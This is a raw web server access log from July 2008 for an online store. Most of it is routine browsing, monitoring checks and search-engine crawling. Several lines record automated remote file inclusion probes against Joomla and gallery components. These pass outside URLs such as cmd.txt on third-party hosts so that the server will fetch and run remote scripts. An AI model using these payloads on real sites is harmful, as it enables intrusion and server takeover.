82.235.7.122 - - [28/Jul/2008:05:27:53 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR={CDCF4E4C-D2F9-4b16-9BA2-77E3609ABC72}; .NET CLR 1.1.4322)"
82.235.7.122 - - [28/Jul/2008:05:27:53 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR={CDCF4E4C-D2F9-4b16-9BA2-77E3609ABC72}; .NET CLR 1.1.4322)"
82.235.7.122 - - [28/Jul/2008:05:27:53 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR={CDCF4E4C-D2F9-4b16-9BA2-77E3609ABC72}; .NET CLR 1.1.4322)"
82.235.7.122 - - [28/Jul/2008:05:27:53 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR={CDCF4E4C-D2F9-4b16-9BA2-77E3609ABC72}; .NET CLR 1.1.4322)"
82.235.7.122 - - [28/Jul/2008:05:27:54 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR={CDCF4E4C-D2F9-4b16-9BA2-77E3609ABC72}; .NET CLR 1.1.4322)"
82.235.7.122 - - [28/Jul/2008:05:27:54 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR={CDCF4E4C-D2F9-4b16-9BA2-77E3609ABC72}; .NET CLR 1.1.4322)"
82.235.7.122 - - [28/Jul/2008:05:27:54 -0400] "GET /images/items/CONFORM_THUMB.JPG HTTP/1.1" 200 1623 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR={CDCF4E4C-D2F9-4b16-9BA2-77E3609ABC72}; .NET CLR 1.1.4322)"
82.235.7.122 - - [28/Jul/2008:05:27:54 -0400] "GET /images/space.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR={CDCF4E4C-D2F9-4b16-9BA2-77E3609ABC72}; .NET CLR 1.1.4322)"
82.235.7.122 - - [28/Jul/2008:05:27:54 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR={CDCF4E4C-D2F9-4b16-9BA2-77E3609ABC72}; .NET CLR 1.1.4322)"
82.235.7.122 - - [28/Jul/2008:05:27:54 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR={CDCF4E4C-D2F9-4b16-9BA2-77E3609ABC72}; .NET CLR 1.1.4322)"
82.235.7.122 - - [28/Jul/2008:05:27:55 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR={CDCF4E4C-D2F9-4b16-9BA2-77E3609ABC72}; .NET CLR 1.1.4322)"
82.235.7.122 - - [28/Jul/2008:05:27:55 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR={CDCF4E4C-D2F9-4b16-9BA2-77E3609ABC72}; .NET CLR 1.1.4322)"
82.235.7.122 - - [28/Jul/2008:05:27:55 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR={CDCF4E4C-D2F9-4b16-9BA2-77E3609ABC72}; .NET CLR 1.1.4322)"
82.235.7.122 - - [28/Jul/2008:05:27:55 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR={CDCF4E4C-D2F9-4b16-9BA2-77E3609ABC72}; .NET CLR 1.1.4322)"
82.235.7.122 - - [28/Jul/2008:05:27:55 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR={CDCF4E4C-D2F9-4b16-9BA2-77E3609ABC72}; .NET CLR 1.1.4322)"
82.235.7.122 - - [28/Jul/2008:05:27:55 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR={CDCF4E4C-D2F9-4b16-9BA2-77E3609ABC72}; .NET CLR 1.1.4322)"
82.235.7.122 - - [28/Jul/2008:05:27:56 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR={CDCF4E4C-D2F9-4b16-9BA2-77E3609ABC72}; .NET CLR 1.1.4322)"
82.235.7.122 - - [28/Jul/2008:05:27:56 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR={CDCF4E4C-D2F9-4b16-9BA2-77E3609ABC72}; .NET CLR 1.1.4322)"
209.59.12.99 - - [28/Jul/2008:05:28:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.67.180 - - [28/Jul/2008:05:28:23 -0400] "GET /logs/access_log.Q107101400 HTTP/1.1" 200 594044 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [28/Jul/2008:05:33:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.132.78.146 - - [28/Jul/2008:05:35:33 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L7F20D7225D62F100EB26045+M37+ENG HTTP/1.1" 200 46154 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F20D72C5312F1008686045+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:05:36:16 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LBF20DA2354F2310090E6032+M37+ENG HTTP/1.1" 200 38096 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F20D7225D62F100EB26045+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:05:36:28 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LBF20DA2D5BF2F100B406032+M37+ENG HTTP/1.1" 200 38095 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LBF20DA2354F2310090E6032+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:05:36:51 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LBF20DA2750D2A100C6B6032+M37+ENG HTTP/1.1" 200 38095 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LBF20DA2D5BF2F100B406032+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
75.125.201.18 - - [28/Jul/2008:05:37:13 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://l4ntak.freehoxt.com/cmd.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.813"
75.125.201.18 - - [28/Jul/2008:05:37:14 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://l4ntak.freehoxt.com/cmd.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.813"
82.235.7.122 - - [28/Jul/2008:05:37:50 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01 HTTP/1.1" 200 52587 "http://www.acesurgical.com/collagen_ftp.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR={CDCF4E4C-D2F9-4b16-9BA2-77E3609ABC72}; .NET CLR 1.1.4322)"
82.235.7.122 - - [28/Jul/2008:05:37:51 -0400] "GET /images/items/5092000_THUMB.JPG HTTP/1.1" 200 2357 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR={CDCF4E4C-D2F9-4b16-9BA2-77E3609ABC72}; .NET CLR 1.1.4322)"
82.235.7.122 - - [28/Jul/2008:05:37:51 -0400] "GET /images/items/5094000_THUMB.JPG HTTP/1.1" 200 1963 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR={CDCF4E4C-D2F9-4b16-9BA2-77E3609ABC72}; .NET CLR 1.1.4322)"
82.235.7.122 - - [28/Jul/2008:05:37:52 -0400] "GET /images/items/5091000_THUMB.JPG HTTP/1.1" 200 1946 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR={CDCF4E4C-D2F9-4b16-9BA2-77E3609ABC72}; .NET CLR 1.1.4322)"
209.59.12.99 - - [28/Jul/2008:05:38:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.132.78.146 - - [28/Jul/2008:05:38:53 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LBF20DA2E5162C100D3B6032+M37+ENG HTTP/1.1" 200 38095 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LBF20DA2750D2A100C6B6032+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:05:39:12 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LBF20DB215262610058B6032+M37+ENG HTTP/1.1" 200 38095 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LBF20DA2E5162C100D3B6032+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:05:39:25 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LBF20DB245452F1006EA6032+M37+ENG HTTP/1.1" 200 46162 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LBF20DB215262610058B6032+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:05:41:16 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LBF20DB205FC251007036032+M37+ENG HTTP/1.1" 200 46183 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LBF20DB245452F1006EA6032+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
210.245.87.117 - - [28/Jul/2008:05:41:36 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:05:41:36 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
83.132.78.146 - - [28/Jul/2008:05:42:19 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LBF20DB2B5CA21100DB16032+M37+ENG HTTP/1.1" 200 46183 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LBF20DB205FC251007036032+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
210.245.87.117 - - [28/Jul/2008:05:42:28 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:05:42:29 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
209.59.12.99 - - [28/Jul/2008:05:43:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.67.180 - - [28/Jul/2008:05:43:50 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L9F2FCF215AE2D100AEB503N+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
83.132.78.146 - - [28/Jul/2008:05:44:28 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LBF20DC265B02E1001A46032+M37+ENG HTTP/1.1" 200 46164 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LBF20DB2B5CA21100DB16032+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:05:44:42 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LBF20DC215372010097D6032+M37+ENG HTTP/1.1" 200 46164 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LBF20DC265B02E1001A46032+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:05:44:57 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LBF20DC2E50F2C1009DB6032+M37+ENG HTTP/1.1" 200 46164 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LBF20DC215372010097D6032+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.106.241.204 - - [28/Jul/2008:05:45:19 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sujianto.com/1d.txt%0D?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
89.106.241.204 - - [28/Jul/2008:05:45:19 -0400] "GET /logs/error_log.Q108040800//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sujianto.com/1d.txt%0D?? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
89.106.241.204 - - [28/Jul/2008:05:45:19 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sujianto.com/1d.txt%0D?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
83.132.78.146 - - [28/Jul/2008:05:45:27 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LBF20DC2D57D2A100A3A6032+M37+ENG HTTP/1.1" 200 50872 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LBF20DC2E50F2C1009DB6032+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
89.106.241.204 - - [28/Jul/2008:05:45:47 -0400] "GET /logs/error_log.Q108040800//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sujianto.com/1d.txt%0D?? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
89.106.241.204 - - [28/Jul/2008:05:45:47 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sujianto.com/1d.txt%0D?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
89.106.241.204 - - [28/Jul/2008:05:45:47 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sujianto.com/1d.txt%0D?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
83.132.78.146 - - [28/Jul/2008:05:45:49 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LBF20DC2A5A623100CC76032+M37+ENG HTTP/1.1" 200 68321 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LBF20DC2D57D2A100A3A6032+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:05:45:50 -0400] "GET /images/items/0900103_THUMB.JPG HTTP/1.1" 200 1406 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LBF20DC2A5A623100CC76032+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:05:45:51 -0400] "GET /images/items/0900108_THUMB.JPG HTTP/1.1" 200 1654 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LBF20DC2A5A623100CC76032+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:05:45:51 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LBF20DC2A5A623100CC76032+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:05:46:13 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LBF20DC2F5E02A100D406032+M37+ENG HTTP/1.1" 200 67738 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LBF20DC2A5A623100CC76032+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:05:46:18 -0400] "GET /images/prev.gif HTTP/1.1" 200 253 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LBF20DC2F5E02A100D406032+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
209.97.201.148 - - [28/Jul/2008:05:46:26 -0400] "GET /logs/error_log.Q108040800//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sujianto.com/load.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
209.97.201.148 - - [28/Jul/2008:05:46:26 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sujianto.com/load.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
209.97.201.148 - - [28/Jul/2008:05:46:26 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sujianto.com/load.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
83.132.78.146 - - [28/Jul/2008:05:46:29 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LBF20DC265D42A100FA96032+M37+ENG HTTP/1.1" 200 55790 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LBF20DC2F5E02A100D406032+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
209.97.201.148 - - [28/Jul/2008:05:46:32 -0400] "GET /logs/error_log.Q108040800//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
209.97.201.148 - - [28/Jul/2008:05:46:32 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
209.97.201.148 - - [28/Jul/2008:05:46:32 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
83.132.78.146 - - [28/Jul/2008:05:47:45 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LBF20DD25537251000866032+M37+ENG HTTP/1.1" 200 48504 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LBF20DC265D42A100FA96032+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:05:50:27 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LBF20DD2D520231004AD6032+M37+ENG HTTP/1.1" 200 46153 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LBF20DD25537251000866032+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
74.6.22.179 - - [28/Jul/2008:05:50:32 -0400] "GET /logs/access_log.Q107102100 HTTP/1.0" 200 1066929 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
83.132.78.146 - - [28/Jul/2008:05:51:33 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LBF20DD2854429100EE56032+M37+ENG HTTP/1.1" 200 38095 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LBF20DD2D520231004AD6032+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:05:52:00 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LBF20DE265F12B1002576032+M37+ENG HTTP/1.1" 200 46157 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LBF20DD2854429100EE56032+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
209.59.12.99 - - [28/Jul/2008:05:52:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.132.78.146 - - [28/Jul/2008:05:52:53 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LBF20DE21593271004256032+M37+ENG HTTP/1.1" 200 46163 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LBF20DE265F12B1002576032+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:05:53:15 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LBF20DE2352B241007436032+M37+ENG HTTP/1.1" 200 46147 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LBF20DE21593271004256032+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
66.249.67.180 - - [28/Jul/2008:05:57:53 -0400] "GET /logs/access_log.Q107051900 HTTP/1.1" 200 985882 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [28/Jul/2008:05:59:00 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
